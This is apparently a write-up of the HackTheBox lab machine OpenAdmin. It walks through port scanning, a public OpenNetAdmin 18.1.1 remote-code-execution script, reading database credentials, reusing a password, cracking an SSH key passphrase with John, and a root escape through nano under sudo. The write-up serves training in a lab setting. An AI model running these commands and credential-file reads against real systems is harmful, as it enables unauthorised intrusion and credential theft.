OpenAdmin writeup

OpenAdmin - 10.10.10.171



First we run nmap: nmap -A -T4 -p- -oN nmap.txt 10.10.10.171 and get the following output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

So only 2 ports are open, 22 for SSH and 80 for apache2, we can already see the webserver only has a test page, so let's start up gobuster and see if we can find something else: gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt to get the following output:

/music (Status: 301)
/artwork (Status: 301)
/sierra (Status: 301)
/server-status (Status: 403)

Looks like there is more running on the server then just a test page. When we look at the /music/ folder we get served a webpage with a lot of non working links, except for 1: the login, this one redirects us to /ona/ an OpenNetAdmin page which also displays a version: 18.1.1.

A quick google search lands us on this exploitdb page, looks like there is an RCE for this version of OpenNetAdmin. All we have to do is copy the script and run it with to URL like so: ./47691.sh http://10.10.10.171/ona/ to get a shell, or actually not a shell, but a way to send commands to the server. If we have a quick look at the exploit we can see that every request uses a new connection, so the state is not saved forcing us to search relative to the current path.

After some snooping around with ls and cat we find a file: local/config/database_settings.inc.php which holds a password:

$ cat local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

Now we have a look at the home directory to see there are 2 users on the system:

  • jimmy
  • joanna

And lucky for us jimmy reuses the password we just found, so now we can login with ssh. Using the groups command we can see that jimmy is member of the internal group, to see if there are any files owned by this group we run the following command: find / -type f -group internal 2>/dev/null and find there are 3 files on the system in /var/www/internal/:

  • index.php
  • main.php
  • logout.php

The main.php file looks very interesting:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

So if we can make a call to this file we should be able to read joanna's id_rsa file. But we need the $_SESSION['username'] to be set. Good thing we have write access so we can do this:

<?php
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

No we need to call this page, nmap didn't show any other ports open, so let's run netstat -l to see if there are any other ports in use:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN     
tcp        0      0 localhost:52846         0.0.0.0:*               LISTEN     
tcp        0      0 localhost:domain        0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN     
tcp6       0      0 [::]:http               [::]:*                  LISTEN     
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN     
udp        0      0 localhost:domain        0.0.0.0:*

Looks like something is listening on port 52846, so let's use curl to connect: curl 127.0.0.1:52846/main.php and now we can see the id_rsa key!

We copy the key and as we can see from the header we still need to crack this, so we use ssh2john to generate a hash johnTheRipper can handle: /usr/share/john/ssh2john id_rsa > id4john and let JTR crack it: john id4john -wordlist=/usr/share/wordlists/rockyou.txt. Now we get the password bloodninjas back and are able to login as joanna. Don't forget to set the right permissions on the id_rsa key chmod 600 id_rsa

Now that we are on the system as joanna we run sudo -l to check our sudo rights and see that we are allowed to run /bin/nano /opt/priv. So we check GTFOBins and search for nano. And we should be able to get shell using the following command in nano running as root

^R^X
reset; sh 1>&0 2>&0

And that's it, we have a shell as root on the system!